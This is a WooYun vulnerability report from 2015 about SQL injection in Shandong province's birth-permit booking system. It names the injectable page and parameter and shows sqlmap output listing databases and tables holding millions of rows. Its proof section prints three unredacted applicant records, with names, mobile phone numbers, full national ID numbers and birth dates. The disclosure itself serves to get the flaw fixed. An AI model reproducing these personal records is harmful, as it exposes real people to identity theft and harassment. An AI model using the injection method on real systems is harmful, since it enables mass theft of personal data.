当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0153114

漏洞标题:山东省生育证预约系SQL注入数百万个人信息(看看哪些人要二胎)

相关厂商:山东省卫生和计划生育委员会

漏洞作者: 撸撸侠

提交时间:2015-11-09 19:19

修复时间:2016-01-11 15:32

公开时间:2016-01-11 15:32

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-11-09: 细节已通知厂商并且等待厂商处理中
2015-11-20: 厂商已经确认,细节仅向厂商公开
2015-11-30: 细节向核心白帽子及相关领域专家公开
2015-12-10: 细节向普通白帽子公开
2015-12-20: 细节向实习白帽子公开
2016-01-11: 细节向公众公开

简要描述:

山东省生育证预约系统sql注入数大量个人信息(看看哪些人要二胎)

详细说明:

**.**.**.**:8080/
**.**.**.**:8080/Bzsq/syzList.aspx?dwdm=370000000000&slflag=2
参数slflag存在注入漏洞

[18:06:26] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 7.5
back-end DBMS: Microsoft SQL Server 2008
[18:06:26] [INFO] fetching database names
[18:06:26] [INFO] the SQL query used returns 15 entries
[18:06:26] [INFO] resumed: GAHJ_20140408
[18:06:26] [INFO] resumed: GAHJ_20140626
[18:06:26] [INFO] resumed: HJ_SWZXHJ
[18:06:26] [INFO] resumed: master
[18:06:26] [INFO] resumed: model
[18:06:26] [INFO] resumed: msdb
[18:06:26] [INFO] resumed: mz_12_13
[18:06:26] [INFO] resumed: mz08-1209
[18:06:26] [INFO] resumed: qmjk20140422
[18:06:26] [INFO] resumed: ReportServer
[18:06:26] [INFO] resumed: ReportServerTempDB
[18:06:26] [INFO] resumed: tempdb
[18:06:26] [INFO] resumed: wis_SX
[18:06:26] [INFO] resumed: wissheng201403
[18:06:26] [INFO] resumed: YHDJXT


Database: wis_SX
+-----------------------------+---------+
| Table | Entries |
+-----------------------------+---------+
| dbo.REP_SHADOW_GKB | 4566806 |
| dbo.gkb | 1690632 |
| dbo.Rep_LogTable | 1460029 |
| dbo.byzk | 1160478 |
| dbo.vbyzk | 1160477 |
| dbo.REP_SHADOW_JBQK | 1067527 |


Database: HJ_SWZXHJ
+----------------------+---------+
| Table | Entries |
+----------------------+---------+
| dbo.HJ_CZRKYW_SWZXHJ | 148743 |
+----------------------+---------+


Database: YHDJXT
+----------------+---------+
| Table | Entries |
+----------------+---------+
| dbo.qh_bak0708 | 149006 |
| dbo.qh_bak0708 | 149006 |
| dbo.qhrz | 93152 |
| dbo.YHDJZMXX | 45152 |
| dbo.TBHZ | 4211 |
| dbo.userinfo | 2154 |

漏洞证明:

屏幕快照 2015-11-09 下午7.00.33.png


bz1	jbr	lxdh	yysj	slsj	fnxm	zfxm	sqsj	lzrq	fnhjd	zfxjd	zfhjd	sqdbh	fnxjd	zfcsrq	zfhkxz	fnsfhm	fnhkxz	sldwmc	fncsrq	shyysj	slflag	zncsrq	sldwdm	znxb_2	zfdszn	fndszn	zfsfhm	wisfnbm	wisgldw
不符合政策规定 宗文文 15094791788 2015-01-05—2015-01-08 01 6 2015 11:45AM 周文静 张贵祯 01 2 2015 9:06PM 01 6 2015 11:45AM 370983001006 370983111220 370983111220 201501010955126902 370983111220 01 21 1989 12:00AM 2 370983198711286181 1 山东省泰安市肥城市边院镇 11 28 1987 12:00AM NULL 3 03 6 2011 12:00AM 370983111000 NULL 2 2 370983198901216133 370983111220000360 370983111000
重复办理服务手册。 玉皇庙计生办 13668810151 <blank> 01 6 2015 2:29PM 曲寿红 张广树 01 2 2015 9:19PM 01 6 2015 2:29PM <blank> <blank> <blank> 201501020921334367 <blank> 12 5 1991 12:00AM 2 370126199012055628 2 山东省济南市商河县玉皇庙镇 12 5 1990 12:00AM NULL 3 10 29 2014 12:00AM 370126105000 NULL 1 2 370126199112050015 370126000000129520 370126105000
经核实可以办理 张金玲 13468460695 2015-01-27—2015-01-30 01 9 2015 2:46PM 马宁宁 张明 01 4 2015 3:10PM 01 9 2015 2:46PM <blank> <blank> <blank> 201501040312185472 <blank> 11 30 1983 12:00AM <blank> 370724198207183908 <blank> 山东省潍坊市潍城区北关街道办事处 07 18 1982 12:00AM NULL 2 04 5 2009 12:00AM 370702004000 NULL 1 2 371202198311305712 370702004425000387 370702004000


修复方案:

版权声明:转载请注明来源 撸撸侠@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:13

确认时间:2015-11-20 14:33

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT下发给山东分中心,由其后续协调网站管理单位处置。

最新状态:

暂无


漏洞评价:

评价